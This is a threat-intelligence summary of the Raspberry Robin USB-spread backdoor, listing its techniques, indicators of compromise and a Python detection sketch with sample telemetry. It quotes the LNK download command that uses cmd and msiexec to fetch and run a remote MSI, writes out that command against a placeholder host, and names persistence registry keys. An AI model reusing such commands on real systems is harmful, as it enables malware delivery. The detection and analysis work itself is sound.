Raspberry Robin Malware Targets Telecom, Governments

Raspberry Robin is a multi-layer, packed backdoor that spreads via infected USB drives and uses LNK files to trigger a downloader; some samples drop a fake payload to frustrate analysis while the real payload stays heavily obfuscated and connects to Tor for C2. The operation targets telecoms and government offices across Latin America, Oceania, and Europe, with possible ties to broader cyber-espionage and potential links to LockBit tooling. #RaspberryRobin #Tor #Msiexec #LNK #TrendMicro #LockBit

Keypoints

  • The arrival routine uses an infected USB and arrives as a shortcut (LNK) file to drop and run payloads.
  • The LNK contains a command line that launches a legitimate Windows component to download an MSI package, enabling loader delivery.
  • The main malware is multi-layered and packed to hinder analysis, with several layers performing anti-analysis techniques.
  • A fake payload is dropped and loaded when anti-analysis is detected, while the real payload remains obfuscated and loaded later.
  • The real payload includes a Tor client for C2 communication and a shared memory mechanism for data exchange, with hard-coded Tor addresses.
  • The malware uses a UAC bypass to escalate privileges and gains persistence via RunOnce/RunOnceEx registry keys.
  • The campaign predominantly targets government agencies and telecoms in Latin America, Oceania, and Europe, with indicators including a SHA256 hash and Tor onion addresses.

MITRE Techniques

  • [T1023] Shortcut Modification – The arrival routine uses an infected USB delivering a shortcut to trigger payloads, and it “arrives as a shortcut or LNK file.”
  • [T1218.005] Msiexec – The LNK file contains a command line that runs a legitimate executable to download a Windows Installer (MSI) package: “cmd.exe /c start msiexec {URL}”.
  • [T1059.003] Windows Command Shell – Cmd.exe interprets the command after /c, enabling the download and execution flow: “cmd.exe /c start msiexec {URL}”.
  • [T1027] Obfuscated/Compressed Files and Information – The main malware is “packed multiple times, with each layer heavily obfuscated” and uses layered packing.
  • [T1090] Proxy – The real payload “attempts to connect to the hard-coded Tor addresses” via a Tor client for C2 communications.
  • [T1548.002] Bypass User Account Control – The drop uses a UAC bypass variant to run the dropped copy as Administrator: “variation of the technique ucmDccwCOMMethod in UACMe.”
  • [T1060] Registry Run Keys / Startup Folder (RunOnce/RunOnceEx) – The malware modifies RunOnce/RunOnceEx registry entries to enable automatic startup: “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce” and “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx.”
  • [T1027] Obfuscated/Compressed Files and Information – The anti-analysis and multi-layer packing extend the capabilities to hinder researchers; “anti-analysis techniques” are noted in layers 3 and 5.
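As an added illustration (not code from the Trend Micro report or its tooling), the following Python sketch turns the two observables quoted above into detection logic: msiexec launched with a remote package URL of the `http://{domain}:8080/{random strings}/` shape, optionally through `cmd.exe /c start`, and values written under RunOnce/RunOnceEx. The event records are simplified, constructed telemetry whose field names mirror Sysmon-style process-creation and registry-value-set events; the host name, paths and SID in them are invented.

```python
"""Detection sketch for the Raspberry Robin observables above (constructed example)."""
from __future__ import annotations

import re
from dataclasses import dataclass

# msiexec (with or without .exe), any number of /flags, then an http(s) URL argument.
MSIEXEC_REMOTE = re.compile(r"msiexec(?:\.exe)?\s+(?:/\S+\s+)*(https?://\S+)", re.I)
# URL shape from the report: http://{domain}:8080/{random strings}/  (query strings tolerated)
RR_URL_SHAPE = re.compile(r"^https?://[^/\s:]+:8080/[^/\s?]+/?", re.I)
# RunOnce / RunOnceEx under any hive (HKCU, HKLM, HKU\<SID>) - the persistence keys named above.
RUNONCE_KEYS = re.compile(
    r"\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce(?:Ex)?(?:\\|$)", re.I
)


@dataclass
class Finding:
    technique: str
    reason: str
    evidence: str


def check_process(event: dict) -> list[Finding]:
    """T1218.005 / T1059.003: msiexec fetching a package from a remote URL."""
    cmd = event.get("CommandLine", "")
    image = event.get("Image", "").lower()
    parent = event.get("ParentImage", "").lower()
    m = MSIEXEC_REMOTE.search(cmd)
    if not m:
        return []
    reason = "msiexec invoked with a remote package URL"
    if RR_URL_SHAPE.match(m.group(1)):
        reason += " matching the :8080/<random>/ shape"
    if image.endswith("cmd.exe") or parent.endswith("cmd.exe"):
        reason += ", launched through cmd.exe"
    return [Finding("T1218.005", reason, cmd)]


def check_registry(event: dict) -> list[Finding]:
    """T1060: a value set under RunOnce or RunOnceEx."""
    target = event.get("TargetObject", "")
    if RUNONCE_KEYS.search(target):
        return [Finding("T1060", "value written under RunOnce/RunOnceEx",
                        f"{target} = {event.get('Details', '')}")]
    return []


def scan(events: list[dict]) -> list[Finding]:
    """Route each event to the matching check and collect findings in order."""
    out: list[Finding] = []
    for e in events:
        if e.get("EventType") == "ProcessCreate":
            out.extend(check_process(e))
        elif e.get("EventType") == "RegistryValueSet":
            out.extend(check_registry(e))
    return out


# Constructed sample telemetry: one LNK-style launch, one benign local install,
# one RunOnce write, one benign Run write, one RunOnceEx write.
SAMPLE_EVENTS = [
    {"EventType": "ProcessCreate", "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "cmd.exe /c start msiexec http://pkg-host.example:8080/Xk92LqT/"},
    {"EventType": "ProcessCreate", "Image": r"C:\Windows\System32\msiexec.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"msiexec.exe /i C:\Users\bob\Downloads\7zip.msi /qn"},
    {"EventType": "RegistryValueSet",
     "TargetObject": r"HKU\S-1-5-21-111-222-333-1001\Software\Microsoft\Windows\CurrentVersion\RunOnce\upd",
     "Details": r"C:\Users\bob\AppData\Local\Temp\svc.exe"},
    {"EventType": "RegistryValueSet",
     "TargetObject": r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive",
     "Details": r"C:\Program Files\Microsoft OneDrive\OneDrive.exe"},
    {"EventType": "RegistryValueSet",
     "TargetObject": r"HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend",
     "Details": r"C:\ProgramData\x\loader.dll"},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f.technique}] {f.reason}: {f.evidence}")
```

Run on the embedded sample it reports the `cmd.exe /c start msiexec` launch and the two RunOnce/RunOnceEx writes, and stays quiet on the local MSI install and the ordinary Run key. In production telemetry the msiexec rule should be scoped with an allow-list for internal software-distribution hosts, since remote MSI installs are legitimate in many estates, while the RunOnce/RunOnceEx rule is low-noise enough to alert on directly.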

Indicators of Compromise

  • [SHA256] Main malware executable – 6fb0ad3f756b5d1f871cf34c3e4ea47cb34643cd17709a09c25076c400313adf
  • [Onion Address] Tor-based C2 endpoints – sejnfjrq6szgca7v, zdfsyv3rubuhpql3, and 18 more onion addresses
  • [URL / Domain] MSI download/source URL pattern – http://{domain}:8080/{random strings}/ (and variants with user or query parameters)

Read more: https://www.trendmicro.com/en_us/research/22/l/raspberry-robin-malware-targets-telecom-governments.html